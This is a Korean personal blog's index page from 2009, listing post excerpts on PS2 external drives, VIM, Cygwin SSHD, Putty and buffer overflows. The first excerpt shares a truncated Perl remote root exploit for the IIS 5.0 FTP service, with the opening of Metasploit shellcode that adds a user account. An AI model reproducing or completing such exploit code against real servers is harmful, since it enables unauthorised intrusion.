본문 바로가기

전체 글452

IIS 5.0 FTPd / Remote r00t exploit 간만에 Remote 공격 스크립트가 나왔다 ^^; iiz5.pl 로 저장하자 #!/usr/bin/perl # IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2googlemail.com # Affects IIS6 with stack cookie protection # August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser "winown:nwoniw" $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . "\x49\x.. 2009. 9. 3.
재미있는 사진 ㅋ 오른쪽 아저씨 참.. 바지가.. 2009. 8. 29.
외장하드를 ps2에 사용하기 이 포스트를 보낸곳 () 준비물: 1 usb 외장하드디스크 (일반 pc용) 2. pc (인터넷 가능) 3 usbExtreme 시디 그럼 준비 끝 자이제 go! 1. usb 외장 하드를 pc에 연결 그러면 아래 그림처럼 된다. 외장 하드 포맷은 NTFS 형식으로 되어야 함 (윈도우 Xp, 2000 포맷 방식) 2. 홈피주소 http://adamu.ohpy.com/139567/3 or http://www.hdadvance.com 에서 USBeXtreme 다운. 압축 풀고, 설치실행 3. 완료후 시작단추 클릭 -> 실행 클릭 4. 실행박스에 command 입력. 아래그림처럼 도스창 나타남. 5. 위그림의 노란밑줄에서 처럼 cd\ 입력. 엔터 6. 이제 포맷하기 위해 아래 그림처럼 ul_format E form.. 2009. 8. 22.
VIM 1. VIM VIM은 Vi IMproved의 약어입니다. 텍스트 편집기로서 유닉스에 있는 'vi'의 대부분의 명령을 지원하며, Vi IMproved가 말해주듯이 많은 새로운 명령들이 추가되었습니다. 1988년 Stevie라는 vi clone 에디터를 Bram (VIM 주 개발자)이 Amiga에 VIM (당시에는 Vi IMitation)이라는 이름으로 포팅하면서 시작되었습니다. IMitation (모방)에서 알 수 있듯이 당시 Amiga 시스템에는 쓸만한 vi가 없었기 때문에 vi의 대부분의 기능을 지원하는 에디터를 Amiga 시스템에서 사용하고자 한 것이 그 출발이었으나, 이후 새로운 기능들이 추가되고, 1992년에 유닉스 시스템으로 포팅하면서 향상된 기능들을 표현하기 위해 Vi IMproved로 바뀌게.. 2009. 8. 20.
CygWin + SSHD + 한글 입/출력 Windows 7 64bit 에서 CygWin + SSHD를 설치했음 1. 일단 www.cygwin.com 에서 cygwin 을 다운로드 받는다. Setup.exe 가 다운로드 될 텐데 적당한데 저장하자. 이것을 다운로드만 받아 둔다. 그리고 마우스 오른쪽 버튼을 눌러 관리자 권한으로 실행 을 눌러 관리자 권한으로 실행 되도록 한다. net 카테고리에 openssh 를 선택해서 설치를 마친다. 2. Cygwin / Bash Shell을 관리자 권한으로 실행 시킨다. 이게 중요하다. 오른쪽 마우스 버튼을 눌러서 관리자 권한으로 실행 을 꼭 선택해서 실행 시켜야 한다. 안그러면, 권한 문제로 sshd 관련 계정과 설정 파일들이 생성 되지 않는다. 3. 윈도우 시스템 환경 변수(제어판>시스템>고급 시스템 설정.. 2009. 8. 18.
HTTPDebuggerPro (트라이얼 버전) 2009. 8. 12.
게임 해킹 2009년 2월 10일 화요일 온라인 게임 서비스 공격 출처 : http://sone.tistory.com/28 온라인 게임 서비스 공격 현황&원리 (중국매크로, 계정 해킹 등) * 이 글은 비단 테일즈위버 뿐만이 아닌 , 모든 온라인게임에 해당되는 글임을 미리 밝힙니다. * 2006년 KISA( 한국정보보호진흥원 ) 에서는 온라인 게임 해킹 대응이란 주제로 문서파일을 배포했습니다. 이 문서에는 국내 온라인게임의 시장 현황, 서비스 구동방식 , 공격현황과 , 그에 따른 대응책 등이 서술되어 있습니다. 정독해본결과 , 최근현황과 크게 다르지 않다고 판단되어 , 문서 내용 중 일부인 , 온라인 게임 서비스 공격 현황에 대해서 글을 옮겨봅니다. 이 공격 현황이란 주제는 대부분 온라인게임에서 골칫거리로 문제되고.. 2009. 8. 10.
멋진 무료 스캐너(w3af) http://w3af.sourceforge.net/ http://w3af.sourceforge.net/videos/video-demos.php 2009. 8. 10.
Buffer Overflow 버퍼 오버 플로우 버퍼오버플로우는 만약 님께서 컵에 1.5L 짜리 물을 부으신다면 컵에서 물이넘치겠죠 이게 바로 버퍼 오버플로우랍니다. 이거랑 무슨 상관이 냐구요? 이해하려면 당연히 이렇게라도 생각하시길.. 이런 것들이 왜 필요가 있을까요? 프로그램의 구조적인 차원에서 한번 볼까요? 프로그램을 짜본 사람은 알꺼에요. 안짜봐도 알겠지만.. main() 함수라는 것이 있으며 반드시 존재해야 프로그램이 돌아가겠죠. 이런 프로그램 소스를 보세요.. main() { printf("hello\n\n"); } 자. 이것을 컴파일 해보세요. 당연히 hello 라는 문자가 나오겠죠.. 왜 끝에 \n(한줄내림)을 두개나 했냐구 요? 제 맘이랍니다. :) 이번에는 좀더 재미있는 것을 해봅시다. int test(void) { int i=100.. 2009. 7. 31.
재현이의 고향 옥도 재현이네 할머니 집 2009. 7. 29.
Putty 멈춤 증상시(ctrl+s) Putty에서 ctrl+s 를 누르면 갑자기 아무것도 안되는데 이 기능은 원래 입출력을 안 보이게 하는 기능입니다 다시 입출력을 보이게 할려면 ctrl+q 를 누르면 됩니다 2009. 7. 24.
torrent + edonkey = Thunder torrent와 edonkey 파일 지원을 하는 프로그램 입니다 2009. 7. 23.